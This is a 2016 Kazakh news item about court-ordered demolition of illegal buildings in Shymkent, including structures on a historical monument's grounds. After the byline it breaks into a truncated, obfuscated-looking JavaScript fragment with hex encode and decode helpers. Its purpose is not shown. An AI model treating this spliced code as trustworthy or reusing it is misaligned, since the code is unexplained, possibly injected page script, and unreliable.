• RUB:
    5.06
  • USD:
    522.49
  • EUR:
    547.88
Басты сайтқа өту
19 Мамыр, 2016

Оңтүстікте заңсыз құрылысқа тыйым салынды

180 рет
көрсетілді

ШЫМКЕНТ. 19 мамыр. Облыста заңсыз құрылыстарға тоқтам салынып жатыр. Бұл туралы egemen.kz тілшісі хабарлады. Облыстық мемлекеттік сәулет-құрылыс бақылау басқармасы мен Шымкент қаласының жер қатынастары бөлімі берген талап арыздар сотпен қаралып, заңсыз нысандарды бұзуға шешімдер қабылданып жатыр. Осыған байланысты «Шымкент қалашығы» тарихи ескерткішінің аумағына заңсыз құрылыс жүргізген қала тұрғындары А.Әділбекова мен Г.Құрбановаға тиесілі құрылыс нысандары бұзылды. Аталған азаматтар салған ғимараттар Қазақстан Республикасы сәулет, қала құрылысы және құрылыс қызметі туралы заңнамаға және жер заңнамасына сәйкес қажетті рұқсат құжаттары алынбай өз бетімен салынған болатын. Бүгінде қала аумағындағы 200-ге тарта нысанның заңдылығы тексерілуде. Егер сотта дәлелін тапса, олар да бұзылмақ. Бақтияр Тайжан. Дерек, фото: egemen.kz // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e